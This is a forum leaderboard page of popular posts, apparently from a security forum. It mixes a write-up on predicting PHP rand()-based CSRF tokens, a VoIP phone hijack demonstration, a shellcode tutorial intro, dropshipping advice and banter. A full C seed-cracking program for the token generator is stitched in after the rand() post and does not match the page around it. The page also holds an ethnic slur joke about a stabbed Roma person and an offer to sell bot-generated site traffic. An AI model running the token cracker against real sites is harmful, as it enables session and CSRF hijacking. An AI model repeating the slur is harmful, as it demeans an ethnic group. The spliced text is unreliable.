
Leaderboard

Popular Content

Showing content with the highest reputation on 02/15/16 in all areas

  1. If you find a gypsy stabbed in the back, take it from me: it's just another case of suicide! :)))))
    4 points
  2. Webapps occasionally need to create tokens that are hard to guess. For example for session tokens or CSRF tokens, or in forgot-password functionality where you get a token mailed to reset your password. These tokens should be cryptographically secure, but are often made by calling rand() multiple times and transforming the output to a string. This post will explore how hard it is to predict a token made with rand().

     How rand works

     In PHP, the function rand() creates pseudorandom numbers. The initial state of the random number generator (the seed) is set with srand. If you don't call srand yourself, PHP seeds the random number generator with some hard-to-guess number when you call rand. The seed passed to srand totally determines the series of numbers that rand will generate. The random number generator keeps a state that is initially set by srand and then changed every time you call rand. This state is specific to the process, so two processes typically return different numbers for rand. On Windows this state has a size of 32 bits and can be directly set using srand. On Linux the state is 1024 bits.

     Our example program

     Our example program is EZChatter, a small toy program put together in a day. It does use CSRF tokens, but does not do a very good job of creating them securely (token.php; the class wrapper is shown here because the cracking script below calls it as Token::gen):

         class Token {
             public static function gen($len = 5) {
                 $token = '';
                 while ($len--) {
                     // first rand() picks the character class, second rand() picks the character
                     $choose = rand(0, 2);
                     if ($choose === 0)
                         $token .= chr(rand(ord('A'), ord('Z')));
                     else if ($choose === 1)
                         $token .= chr(rand(ord('a'), ord('z')));
                     else
                         $token .= chr(rand(ord('0'), ord('9')));
                 }
                 return $token;
             }
         }

     As you can see, it first calls rand to determine whether to use an uppercase letter, a lowercase letter or a number, and then again to pick a specific letter or number. Every time we request the index.php page we get a new CSRF token, so we can request as many as we want. Our job is to predict tokens that have been handed out to other users, so we can do a CSRF attack on them.

     Seed cracking

     As we said, the random number series is totally defined by the seed, so we can simply try every possible number as the argument for srand to get the random number generator into the right state. Note that on Linux this will only work if the server process is fresh. If the server process has already seen a lot of rand calls, we need to do the same number of calls in our cracking program to get the same state. On Windows, the state of the random number generator is the same as the argument to srand, so you don't need a fresh process. If we got a token from a fresh process, the following PHP script can be used to crack it:

         for ($i = 0; $i < PHP_INT_MAX; $i++) {
             srand($i);
             if (Token::gen(10) == "2118Jx9w3e") {
                 die("Found: $i \n");
             }
         }

     To search the 4294967295 possible arguments to srand, this will take approximately 12 hours. However, since PHP just calls the glibc rand function, we can reimplement the PHP code in C and speed things up. I have made two versions, one that calls the glibc rand and one that mimics the Windows rand. It is basically the PHP code from token.php, a copy-paste of some macros from PHP's ext/standard/rand.c, and a loop to go through every possible seed. This will take about 10 minutes for the Windows version and a couple of hours for the Linux version. Once completed, you have the random number generator in the same state and you can keep generating the same tokens as on the server. By comparing your own generated tokens with the tokens the server returns, you know which tokens have been handed out to other users, and you can start your attack.

     State cracking on Linux

     On Windows, cracking the argument to srand and cracking the state of the random number generator turn out to be the same thing, but on Linux they are different. The glibc rand() keeps a series of numbers, and determines the next state like this:

         state = state[i-3] + state[i-31]
         return state >> 1

     So every output is approximately the summed output from 3 and 31 calls ago.

     Consider the following series of tokens:

         6ZF5kNgonV
         9h3byovpGR
         gGt0A94U92

     Now, the next rand will determine whether it will be an uppercase letter, a lowercase letter or a number. This is determined by the outcomes of rand 3 and 31 calls ago. That's the last 9 in gGt0A94U92 and the y in 9h3byovpGR. So we expect the next output of rand(0, 2) to be approximately ⌊10/10 + 25/26 × 3⌋ = 2 mod 3, so that means we get a number. Let's see if we can predict that number. The next call to rand, which determines the number, is determined by the rand from 3 calls ago, a number, and the rand from 31 calls ago, a lowercase letter. The number will thus be between ⌊2/3 + 1/3 × 10⌋ = 0 mod 10 and ⌊3/3 + 2/3 × 10⌋ = 6 mod 10. We thus expect the number to be between 0 and 6. It turns out to be 4:

         43J2d2ew31

     As you can see, we cannot accurately predict the next token using this method, but it is also clear that we can predict so much about it that you can hardly call it random. It may also be possible to crack the whole state of the glibc random number generator given enough tokens, although I have not tried this.

     Conclusion

     Tokens should be created using a cryptographically secure random number generator. If they are made with rand, the state of the random number generator can be cracked trivially in many cases, and tokens can be predicted. On Linux it is a little bit harder to predict tokens, but this still does not give secure tokens. The random number generator on Windows is particularly easy to exploit, since any state of the random number generator can be cracked within minutes.

     Source
    4 points
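The generator, range mapping and token routine described in the post above, reimplemented in C as an added example. This is not the post's own cracker and not EZChatter's code: it assumes glibc's default TYPE_3 random() algorithm, PHP 5's RAND_RANGE macro from ext/standard/php_rand.h with PHP_RAND_MAX = 2^31-1 on Linux, and narrows the brute-force seed range so the demo finishes instantly (the post's cracker walks all 2^32 seeds). It also tightens the post's "approximately the sum" into the exact rule that follows from dropping the low bit (the next output is the sum of the outputs 3 and 31 calls ago modulo 2^31, or that value plus one), and includes the msvcrt LCG to show why, on Windows, the whole state is just the srand() argument.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* glibc's default (TYPE_3) random(): 31 words of state, next word is r[i-3] + r[i-31]
 * (32-bit wraparound), output is that word >> 1. PHP's rand() on Linux wraps this. */
#define DEG 31
typedef struct { int32_t r[DEG]; int f, b; } glibc_rng;

static uint32_t glibc_rand(glibc_rng *g)
{
    uint32_t val = (uint32_t)g->r[g->f] + (uint32_t)g->r[g->b];  /* r[i-31] + r[i-3] */
    g->r[g->f] = (int32_t)val;
    g->f = (g->f + 1) % DEG; g->b = (g->b + 1) % DEG;
    return val >> 1;  /* glibc drops the least random bit */
}

static void glibc_srand(glibc_rng *g, uint32_t seed)
{
    int32_t word = (int32_t)(seed ? seed : 1);
    g->r[0] = word;
    for (int i = 1; i < DEG; i++) {  /* Schrage's method: 16807 * word mod (2^31 - 1) */
        int64_t w = 16807 * (int64_t)(word % 127773) - 2836 * (int64_t)(word / 127773);
        word = (int32_t)(w < 0 ? w + 2147483647 : w);
        g->r[i] = word;
    }
    g->f = 3; g->b = 0;
    for (int i = 0; i < DEG * 10; i++) glibc_rand(g);  /* glibc discards the first 310 */
}

/* n-th raw output (1-based) after srand(seed); glibc gives 1804289383, 846930886, ... for seed 1 */
static uint32_t nth_output(uint32_t seed, int n)
{
    glibc_rng g; uint32_t v = 0; glibc_srand(&g, seed);
    while (n-- > 0) v = glibc_rand(&g);
    return v;
}

/* PHP 5's RAND_RANGE macro (ext/standard/php_rand.h); PHP_RAND_MAX is 2^31-1 on Linux */
static long php_rand_range(uint32_t n, long min, long max)
{
    return min + (long)((double)((double)max - min + 1.0) * (n / 2147483648.0));
}

/* Port of EZChatter's Token::gen(): one rand() picks the class, the next picks the character */
static void ezchatter_gen(glibc_rng *g, char *out, int len)
{
    for (int i = 0; i < len; i++) {
        long choose = php_rand_range(glibc_rand(g), 0, 2);
        if (choose == 0)      out[i] = (char)php_rand_range(glibc_rand(g), 'A', 'Z');
        else if (choose == 1) out[i] = (char)php_rand_range(glibc_rand(g), 'a', 'z');
        else                  out[i] = (char)php_rand_range(glibc_rand(g), '0', '9');
    }
    out[len] = '\0';
}

/* Token a fresh PHP process would hand out for a given seed (len <= 63) */
static const char *token_for_seed(uint32_t seed, int len)
{
    static char buf[64]; glibc_rng g; glibc_srand(&g, seed);
    ezchatter_gen(&g, buf, len > 63 ? 63 : len);
    return buf;
}

/* Seed cracking: replay gen() from srand(s) for every s in [lo, hi] until the observed
 * token appears. The range is narrowed for the demo; the post's cracker walks all 2^32. */
static long long crack_seed(const char *token, uint32_t lo, uint32_t hi)
{
    char cand[64]; glibc_rng g;
    int len = (int)strlen(token); if (len > 63) return -1;
    for (uint64_t s = lo; s <= hi; s++) {
        glibc_srand(&g, (uint32_t)s);
        ezchatter_gen(&g, cand, len);
        if (strcmp(cand, token) == 0) return (long long)s;
    }
    return -1;
}

/* The Linux prediction made exact: each output lost its low bit, so the next output is
 * (o[i-3] + o[i-31]) mod 2^31 or that plus one. Returns 1 if all n outputs obey this. */
static int prediction_holds(uint32_t seed, int n)
{
    uint32_t o[1024]; glibc_rng g;
    if (n > 1024) n = 1024; glibc_srand(&g, seed);
    for (int i = 0; i < n; i++) o[i] = glibc_rand(&g);
    for (int i = DEG; i < n; i++) {
        uint32_t base = (o[i - 3] + o[i - DEG]) & 0x7fffffffu;
        if (o[i] != base && o[i] != ((base + 1) & 0x7fffffffu)) return 0;
    }
    return 1;
}

/* Windows: msvcrt rand() is a 32-bit LCG whose entire state is the srand() argument */
static uint32_t msvcrt_nth_output(uint32_t seed, int n)
{
    uint32_t state = seed, v = 0;
    while (n-- > 0) { state = state * 214013u + 2531011u; v = (state >> 16) & 0x7fffu; }
    return v;
}

int main(void)
{
    const char *t = token_for_seed(12345, 10);
    printf("token %s -> seed %lld, prediction rule holds: %d\n", t, crack_seed(t, 0, 20000), prediction_holds(1, 500));
    return 0;
}
```

The seed search only needs a token from a fresh process, exactly as the post says; if the server has already served rand() calls, the same number of outputs has to be consumed before ezchatter_gen() is compared. prediction_holds() is the check a practitioner would run before trusting the "3 and 31 calls ago" reasoning on a live token stream: once two candidate values per output are all that remain, the character-class choice and most of the character are known from earlier tokens alone.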
  3. Malwarebytes Anti-Ransomware uses advanced proactive technology that monitors what ransomware is doing and stops it cold before it even touches your files. It has no shot at encrypting. And it does not rely on signatures or heuristics, so it’s light and completely compatible with antivirus. These methods proved to be so successful at stopping ransomware that Malwarebytes Anti-Ransomware detected all of the latest and most dangerous ransomware variants right out of development and into beta 1. This means when running Malwarebytes Anti-Ransomware, you do not have to worry about getting infected by CryptoLocker, CryptoWall, or CTBLocker. Better yet, it can defeat new ransomware the moment it is released, proactively protecting you from ransomware that’s never even been seen before. Malwarebytes Anti-Ransomware open beta starts today and is available for anyone to install and try out. Please keep in mind that this is the first beta and there may be some bugs or issues that need to be worked out, so we encourage you to try it out in a non-production environment first. Download Beta https://malwarebytes.box.com/s/uluqe6ms2l36bsxkudurlr7yr8lp6d8g
    3 points
  4. Hello, we have discussed this subject before; I think some topics were unfortunately lost, but the forum update is a good omen, and articles can be written at any time. For those who have written to me lately here, on Skype, Facebook etc., I'll try to answer here; since the forum is public, maybe it helps others too. I won't go over what I do and how I do it again, I'll try to answer a few questions.

     1) Do you need a company to start a dropshipping business? If you want it to be something serious, I recommend you set one up; at the beginning you won't need it, but over time you'll be handling more and more money and you'll need a company, PayPal will start asking questions and it will get stressful.

     2) What knowledge do you need? Computer use and intermediate English. You do indeed need an online store, but there are 100000+ tutorials, you don't need special knowledge, or you can use Shopify!

     3) Where do I get the products from? From anywhere! That is, if you don't own a company. If you do have a company, which I recommend, suppliers can be found: there are marketplaces for this, one example is Doba. If you don't have a company and are still looking for a supplier, you can take a look here: http://www.blackhatworld.com/blackhat-seo/f68-dropshipping-wholesale-hookups/

     4) How much time does it take? I also have a job... and... Me too, yes, I also have a job; it is indeed more relaxed, but I have an 8-hour schedule and I still somehow manage to take care of dropshipping as well. I prefer to have a job and also work on my own business, until I save up enough money to invest in something better, or to expand what I already have.

     5) I have a site, I have everything planned, but I have nobody to sell to! The method with money + fast: spend money to make money! = Facebook Ads, Google AdWords, SEO campaigns. The method without money: social media pages -> sharing in all the groups in your niche + "Buy & Sell" type groups, follow 4 follow, pin, etc... depends on the network.

     SEO -> I think you can optimize the pages yourself without anyone's help, there is far too much information on the internet; then you can passively start building backlinks, social signals, etc.

     6) What payment systems do you use?! Before having a company I used only PayPal, because it lets those who don't have an account pay by card too; now I have a company and have almost all the systems integrated: card, PayPal, Western etc.

     7) How much should I mark up the products?! My formula: PRODUCT PRICE + PRICE OF THE FASTEST SHIPPING + 20 - 40% - this also depends on the value of the product.

     8) What do I do if someone asks me for contact details?! Did you grow up in a cave? Or, well, maybe you're mute, then I understand you; if neither applies, you go nicely to Skype, buy a phone number from them, redirect it to your own phone number and talk to people.

     9) What do I do if I don't know English?! Pass!

     10) How much profit do you make and how quickly did you start earning money? I make enough, otherwise I wouldn't stick with the business and wouldn't set up a company for these things. How quickly? For me, from the first day, because I already had a few social media accounts set up for these things.

     11) Can you give me a link to your sites and/or your pages?! NO.

     These are the most common questions I get; dropshipping is in everyone's sight, it's no secret, you can all do it, so stop saying you can't make money on the internet! As a good friend of mine used to say: "Real money on the internet is made from brokering services... he has the product, you sell it, period." All the best and happy earning!
    2 points
  5. Man, the idea is that I assume that at some point in your life you too have placed an order online. And I think you know you can't really pick up the parcel if you can't answer the courier's phone call. I mean, it's something intuitive for an order. Good luck.
    2 points
  6. Verdict: murder. Reason: - notice the note which we're all apparently tempted to believe the victim wrote. A small detail: the lamp, apparently pointed at the note, is not plugged in => someone rushed to make it look as if the victim needed light to write the note. Moreover, why would you get a can of Cola and kill yourself before drinking it? D'ohh. That overturned chair doesn't really belong in the scene: - if the victim was sitting on the chair when shooting themselves in the head, the blood stain couldn't have been so dense (the one on the wall) - if the victim shot themselves next to the wall, judging by the proportions in the picture, there's no way they could have knocked over the chair. The burgundy book at the top right seems a bit out of place (someone was looking for something). So: which one of you was it? What did you have against the poor man? @Byte-ul it's you
    2 points
  7. A few weeks ago, I was asked to observe an installation of several wireless access points & VoIP phones, with a view to making recommendations on how best to improve security while maintaining ease of deployment. It didn't take long for several trends to appear; chief amongst which was the use of

     Of course, as soon as the device burst into life, it's on to the next one. At which point, "now" becomes a distant memory, along with any thoughts of hardening the device for use in a commercial setting. This was not a fly-by-night company either, nor do they install cheap & cheerful hardware; we're fitting enterprise-grade Cisco, Snom & Ubiquiti UniFi equipment. With a tight schedule & reputable brand names, I completely understand why many installers trust the default configurations so vehemently.

     A default config is rarely a secure config. A default configuration is only intended to restore a device to a "default" state, such that a competent installer can configure it to meet the client's needs.

     Note: This is neither aimed at nor unique to Snom devices. I'm aware of similar exploits against current Cisco devices too.

     In the following example, I've reset a Snom 320 VoIP phone (running 8.7.5.13 firmware) back to factory "default" settings. Even before we begin, there's a serious problem... there's no authentication whatsoever! To their credit, some manufacturers provide a default set of credentials... even if they're usually "admin/admin", thus equally insecure. Snom, however, opted to place a tiny "HTTP password not set" warning at the top of the configuration screen. That'd be fine if it forced you to set a password during the setup process, but it doesn't. To make matters worse, it's only too happy to accept a single character/number password too.

     A reasonable argument, you might think. So, let's put it to the test.

     Hijacking the Snom 320

     Step 1: Visit a site which contains the exploit payload. That's it.

     Simply by opening a malicious site (or a genuine site containing the malicious payload), the attacker has complete control over our VoIP phone. To demonstrate this vulnerability, I enlisted the help of two colleagues... Per Thorsheim & Scott Helme. Per will play the part of our attacker, embedding the exploit on a site which he controls. Meanwhile, I'm reading Per's site while having a private conversation with Scott, via Skype. Unbeknownst to me, Per has forced my VoIP phone to call his premium-rate number and disabled the speaker, so unless I'm looking at the phone, I wouldn't know it's dialling.

     Note: We've left the activity LED on during this demo, as it's difficult to read the screen. When the light illuminates, the phone is dialling out.

     What can the attacker do? Virtually anything. Make calls, receive calls, transfer calls (even before it rings), play recordings, upload new firmware and crucially... use the device for covert surveillance.

     Our self-defeating approach...

     If we look beyond the IP telephony sector to the industry as a whole, many companies ship devices which have no "default" security... or permit the use of weak credentials which provide nothing more than a false sense of security. It has to stop. Vendors - If you must supply devices with "default" credentials, disable all other functionality until a suitably secure password is set to replace it.

     The term "covert surveillance" is usually only associated with nation states, certain 3-letter agencies and those closed-minded individuals pushing the Investigatory Powers Bill (IPBill / Snoopers' Charter). In this demonstration, the attacker has not only compromised your phone & privacy with just a browser, but you've paid him for the privilege!

     If you install, use or just find yourself sat next to one of these devices, just remember... it's basically a PC, with all the security vulnerabilities associated with them. Don't assume it's safe because it's running as the manufacturer intended; seek professional advice.

     1) Use strong passwords, derived from a password manager.
     2) VLAN / network-segregate your phones, if possible.
     3) Restrict access to APIs, even if they're only visible internally.
     4) Check & upgrade your firmware regularly, ensuring it doesn't revert to "defaults" afterwards.

     Just today, Professor Alan Woodward of Surrey University published an article entitled "Are you the only one using your VOIP phone?" which discusses the various attack vectors & implications associated with VoIP devices. If you haven't yet subscribed to Alan's RSS feed, I'd strongly suggest doing so.

     Thanks to Per Thorsheim & Scott Helme for their help with this demonstration. That's it folks... for now.

     SOURCE - https://paul.reviews/pwnphone-default-passwords-allow-covert-surveillance/
    1 point
  8. You can try hitleap.com, it seems perfect for what you need; I also have an account from which I can offer you about 200k hits/10 sec. I don't use it, so I'll settle for a few euros.
    1 point
  9. Introduction to Windows shellcode development – Part 3
     February 15, 2016, Ionut Popescu

     If you missed the first two parts of this article, in Part I you can find what a shellcode is, how it works and what its limitations are, and in Part II you can read about the PEB (Process Environment Block) structure, the PE (.exe, .dll) file format and go through a short ASM introduction. You'll need this information in order to properly understand Windows shellcodes.

     In this last part of the shellcode development introduction, we will write a simple "SwapMouseButton" shellcode, a shellcode that will swap the left and right mouse buttons. We will start from an existing shellcode: "Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode". The shellcode name tells us a few things, such as that it uses:
     - URLDownloadToFile, a Windows API function, to download a file
     - WinExec to execute the file (an executable file: .exe)
     - ExitProcess to terminate the process running the shellcode

     Using this example, we will call the SwapMouseButton function and the ExitProcess function. I'm pretty sure it is easy to understand what these functions do.

         BOOL WINAPI SwapMouseButton(_In_ BOOL fSwap);
         VOID WINAPI ExitProcess(_In_ UINT uExitCode);

     As you can see, each function has only one parameter:
     - fSwap can be TRUE or FALSE. If it is TRUE, the mouse buttons are swapped, else they are restored.
     - uExitCode represents the process exit code. Each process must return a value on exit (zero if everything was OK, any other value otherwise). This is the "return 0" of the main function.

     Link: http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/
    1 point
  10. 1 point
  11. That cigarette paper is made specifically to inhibit fire, so that they go out on their own after a certain time, to avoid fires. https://en.wikipedia.org/wiki/Fire_safe_cigarette
    1 point
  12. And what the products are is top secret, is it? And you know how to sell the way Russians drink water.
    1 point
  13. @Maximus has a sales program.
    1 point
  14. And another problem would be that ClickBank has a very high refund rate; what do you do if out of 2000 invoices 500 are refunds? It gives you a headache.
    1 point
  15. Please don't start with the soap operas. The theme isn't the only thing I changed on the forum. We're going to try to keep it cleaner, so stop the flaming and the off-topic. Example: @AGSQ, @ManutaDeAur, @Kronzy and @Meteosensibilul, you've been somewhat off-topic in your latest replies. The report system is very nice here, so if someone "jumps the fence", use it with confidence instead of replying in the thread and ruining the original topic. #numazic
    1 point
  16. Free Trial Details: When you join Perfect Audience, the first Facebook or web retargeting campaign you launch will be completely free for 2 weeks after it launches or until it reaches $100 in spend. You'll receive an e-mail 2 days before your campaign's free trial expires to let you know. If your campaign is still active at the end of the trial period, we will automatically switch it from free trial mode to full mode and bill you for the current pay period's budget. This ensures continuity of ad serving. Advertisers are limited to one free trial campaign, which can be launched as soon as your site's 'All Visitors' Retargeting Audience has cookied 250 visitors in a 7 day period. Mobile, Web & Facebook Retargeting Made Simple | Perfect Audience. My campaign was activated within a few hours.
    1 point
  17. To charge, batteries need a voltage higher than the nominal one. I couldn't say exactly what the difference is. Usually phones (at least those that can be charged from USB sources) are either built to charge from 5V or have voltage regulation chips inside.
    1 point
  18. If the original charger is 5V, it's fine.
    1 point
  19. The phone will "draw" as much current as it needs. It's fine even if you give it 10 amps. The voltage has to be the same.
    1 point
  20. I think this chick got the envelope at the end of the fiscal year from the tax office, sat down comfortably on the chair for a cigarette, opened a can of Cola since she didn't have any JB at hand, and when she saw how much she had to pay, she put the gun in her mouth and chose the easiest way out; why live in Romania when she can be happy in the other world.
    -1 points
  21. [part 1] Some basic Linux commands. Hello guys, today we just started a new series on Linux commands. It's gonna be fun. Tutorial link:: so keep watching Pentesting with spirit. Please subscribe to my channel to get notifications for the upcoming tutorials, and please like & share too :cool: Sharing is power :blackhat: and please comment if I have done anything wrong ----------------------------------------------------------------------------------------------------------- Subscribe to our channel:: www.youtube.com/c/Pentestingwithspirit Like our Facebook page:: www.facebook.com/Pentest.with.spirit1 Follow us on Twitter:: @spirit3113
    -1 points
  22. You could also go and Neo1337nude
    -2 points